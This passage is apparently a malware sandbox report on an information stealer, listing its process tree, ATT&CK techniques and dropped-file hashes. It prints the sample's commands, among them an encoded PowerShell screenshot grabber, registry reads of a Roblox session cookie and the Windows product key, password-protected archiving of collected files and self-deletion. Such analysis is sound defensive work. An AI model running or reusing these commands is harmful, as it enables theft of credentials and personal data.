      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3516
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3356
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xofhx0tu\xofhx0tu.cmdline"
        5⤵
        
        PID:5076
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES926C.tmp" "c:\Users\Admin\AppData\Local\Temp\xofhx0tu\CSC6AAAB87AB8C44E8D8726716DFF6D19B.TMP"
        6⤵
        
        PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1188
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4268
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1840
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1580
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1904
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1940
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\WoP5b.zip" *"
    3⤵
    PID:1760
  - - C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\WoP5b.zip" *
      4⤵
      Executes dropped EXE
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3504
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1188
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2468

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd34eccc40,0x7ffd34eccc4c,0x7ffd34eccc58
  2⤵
  PID:2824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,13148110910138007478,14077302005020037622,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:2
  2⤵
  PID:748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2072,i,13148110910138007478,14077302005020037622,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  PID:2840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,13148110910138007478,14077302005020037622,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2464 /prefetch:8
  2⤵
  PID:4352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,13148110910138007478,14077302005020037622,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:2316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,13148110910138007478,14077302005020037622,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:1428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4248,i,13148110910138007478,14077302005020037622,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  PID:3192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4796,i,13148110910138007478,14077302005020037622,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4804 /prefetch:8
  2⤵
  PID:2340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,13148110910138007478,14077302005020037622,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3608 /prefetch:8
  2⤵
  PID:4608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5068,i,13148110910138007478,14077302005020037622,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1888

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
42d000ead1b3f76979493e669980298b

SHA1
cd615ea2892ff1a8329f5eab80dd4e334552cf1e

SHA256
ffd7b4a1c972bcda9ddbbd466aa7855d9998b5ab17d8ec35269c7a1900081699

SHA512
d5ecc0db16e84eb8f51bf3a456d10c8c78ea06c8dbe5cfbb1e29c12f50d7cd92534f4a697dbf3493d6a3a1e8fbc00a5d1feb67d3e23eda1cd8065c7da21bc4f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
8e9a0e33cb8e0dd0d86ecb47944d529b

SHA1
e5da80d63a82e7ecc27b2a2a60222fa87d28b68f

SHA256
aeb8a5850d1b3dbc3b3d23a8c11a2248022749d3c420101bf02f8567b7b9205b

SHA512
f3ff4deee38b51a60ec029f3ef78f7c4c4a117c00087dab934d26dbc1d90e0371bd6fcef90a5b801b1a3ce1d109f7b229005838d2ca974f76a1c5c0341919681

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
e902510e3d7a705f57215035a7b7730b

SHA1
d42f39456f4452a47199497834b14130f2e0e807

SHA256
e3dae53c0e3cb619a2d903512d7e7af81a8a6d4bfd445e7ec96dd717e0007f57

SHA512
39a2c0ed656aacaacabc9c2795ed0d0cf28c2a67b1fd3d50bf987f8394772e7b8415848c87280e51f2810c64610c910f4bec334cd152487bbbc6f35785f69af9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
e7dda2238b0ea21f97a1c07e12cee831

SHA1
43f29b944211951f033d6cf166ffbe859850c592

SHA256
5f47e05877bcfd1d243ded9043ba7df3bcdb970cf50cad4ea9709fd6219f965d

SHA512
f30fefbe8f9f7d4098d58007fddce623f8eb87aef6247c188000fec67cf84f2b804d5457806ea367db421c68a576e1f3643d12dd57735d3f5f4ddc7aeaa75aef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bbbcf0c29d710c3ba6a474fca8484404

SHA1
70104fca9fd15190b70e381642b69ae2b8e5fa33

SHA256
7f03013142e36fa3fa615ecc54faf3079648b6a4d4bf3c284dfc223b63f98d7f

SHA512
1603a48473ede8e4616b94b7d740a051040fa76b1f4cfb13e898b859676993a0e593b5d97f78b66d4ff3c4e37d2edd7fe67d8a75ef1125a0df60f8368beb4539

Download Submit
